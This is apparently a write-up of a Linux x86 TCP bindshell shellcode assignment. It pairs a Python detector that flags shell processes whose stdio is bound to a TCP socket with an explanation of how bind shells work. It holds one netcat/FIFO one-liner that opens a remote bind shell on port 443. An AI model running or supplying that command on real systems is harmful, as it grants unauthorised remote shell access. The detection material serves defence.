Assignment Goals (SLAE-1530)
1) Create a TCP bindshell shellcode for Linux x86-32.
2) The port number should be easily configurable.
3) Bonus points if the shellcode gets referenced on exploit-db or shell-storm.
TCP Bindshell Principle
In a few words, a TCP bindshell is a tiny server program that waits for new clients on a specific port.
When a new client connects, the server spawns a new shell (e.g. /bin/bash or /bin/sh) and "binds" the shell's file descriptors stdin (0), stdout (1) and stderr (2) to the new client socket.
Yes, on Linux a socket is nothing more than a file (descriptor).
One infamous way to create a bindshell without writing any code is to use Netcat as follows:
root@local:# mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc -lvp 443 1>/tmp/backpipe
When you connect to port 443 (with any dumb client program, e.g. Netcat or Telnet) you get remote control over the shell instance:
user@local:$ nc 127.0.0.1 443
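The same principle seen from the defender's side, as an added example that is not part of the original post: a bindshell hands the accepted client socket to the shell's fds 0, 1 and 2, so in /proc/<pid>/fd those three links of the shell all resolve to one "socket:[<inode>]", and that inode can be matched against /proc/net/tcp to find the connected client or the listening port. The script below parses /proc/net/tcp, checks each shell process's stdio links, and reports matches; the function names are this example's own and the sample data is constructed.

```python
#!/usr/bin/env python3
"""Spot shell processes whose stdin/stdout/stderr are all bound to one TCP socket.

Function names are this example's own (hypothetical), not a library API.
"""
import os
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")
TCP_STATES = {"01": "ESTABLISHED", "0A": "LISTEN"}  # the two states we care about


@dataclass
class TcpEntry:
    local_addr: str
    local_port: int
    remote_addr: str
    remote_port: int
    state: str
    inode: int


def _decode_addr(field: str) -> Tuple[str, int]:
    """'0100007F:01BB' (little-endian hex IPv4, hex port) -> ('127.0.0.1', 443)."""
    ip_hex, port_hex = field.split(":")
    octets = [int(ip_hex[i:i + 2], 16) for i in (6, 4, 2, 0)]
    return ".".join(str(o) for o in octets), int(port_hex, 16)


def parse_proc_net_tcp(text: str) -> List[TcpEntry]:
    """Parse the IPv4 table of /proc/net/tcp; the header line (no 'N:' slot) is skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 10 or not parts[0].endswith(":"):
            continue
        laddr, lport = _decode_addr(parts[1])
        raddr, rport = _decode_addr(parts[2])
        entries.append(TcpEntry(laddr, lport, raddr, rport,
                                TCP_STATES.get(parts[3], parts[3]), int(parts[9])))
    return entries


def listening_ports(entries: List[TcpEntry]) -> List[Tuple[str, int]]:
    """Every LISTEN socket as (address, port), sorted."""
    return sorted((e.local_addr, e.local_port) for e in entries if e.state == "LISTEN")


def stdio_socket_inode(fd_links: Dict[int, str]) -> Optional[int]:
    """Socket inode if fds 0, 1 and 2 all point at the same socket (dup2 pattern), else None."""
    inodes = set()
    for fd in (0, 1, 2):
        match = SOCKET_LINK.match(fd_links.get(fd, ""))
        if match is None:
            return None
        inodes.add(int(match.group(1)))
    return inodes.pop() if len(inodes) == 1 else None


@dataclass
class Finding:
    pid: int
    comm: str
    inode: int
    peer: Optional[str]  # "ip:port" of the client when the inode is in the TCP table


def find_socket_backed_shells(procs, entries, shells=("sh", "bash", "dash")) -> List[Finding]:
    """procs maps pid -> (comm, {fd: link target}); flag shells whose stdio is one socket."""
    by_inode = {e.inode: e for e in entries}
    findings = []
    for pid, (comm, fd_links) in procs.items():
        inode = stdio_socket_inode(fd_links) if comm in shells else None
        if inode is None:
            continue
        entry = by_inode.get(inode)
        peer = f"{entry.remote_addr}:{entry.remote_port}" if entry else None
        findings.append(Finding(pid, comm, inode, peer))
    return findings


def read_live_proc():
    """Collect (procs, entries) from the running system; root is needed to read other users' fds."""
    procs = {}
    for name in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{name}/comm") as f:
                comm = f.read().strip()
            fd_dir = f"/proc/{name}/fd"
            links = {int(fd): os.readlink(os.path.join(fd_dir, fd)) for fd in os.listdir(fd_dir)}
        except OSError:  # process exited meanwhile, or fd table not readable
            continue
        procs[int(name)] = (comm, links)
    with open("/proc/net/tcp") as f:
        return procs, parse_proc_net_tcp(f.read())


# Constructed sample: a listener on 0.0.0.0:443 (inode 12345), one accepted client from
# 127.0.0.1:50000 (inode 12346), and a /bin/sh whose fds 0, 1 and 2 are that client socket.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:01BB 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0100007F:01BB 0100007F:C350 01 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 20 4 30 10 -1
"""
SAMPLE_PROCS = {
    1000: ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),           # interactive shell
    1001: ("sh", {0: "socket:[12346]", 1: "socket:[12346]", 2: "socket:[12346]"}),  # socket-backed shell
    1002: ("nc", {0: "/dev/pts/1", 1: "pipe:[777]", 2: "/dev/pts/1", 3: "socket:[12345]"}),
}

if __name__ == "__main__":
    live = os.path.exists("/proc/net/tcp")
    procs, entries = read_live_proc() if live else (SAMPLE_PROCS, parse_proc_net_tcp(SAMPLE_PROC_NET_TCP))
    print("listening:", listening_ports(entries))
    for hit in find_socket_backed_shells(procs, entries):
        print(f"pid {hit.pid} ({hit.comm}) stdio -> socket inode {hit.inode}, peer {hit.peer}")
```

Note that the Netcat/FIFO variant above looks different in /proc: the shell's fd 0 is the FIFO and fd 1 a pipe, while the socket belongs to the nc process, so the stdio check alone misses it and the listening-port list (which shows 0.0.0.0:443 held by nc) is the signal to correlate with.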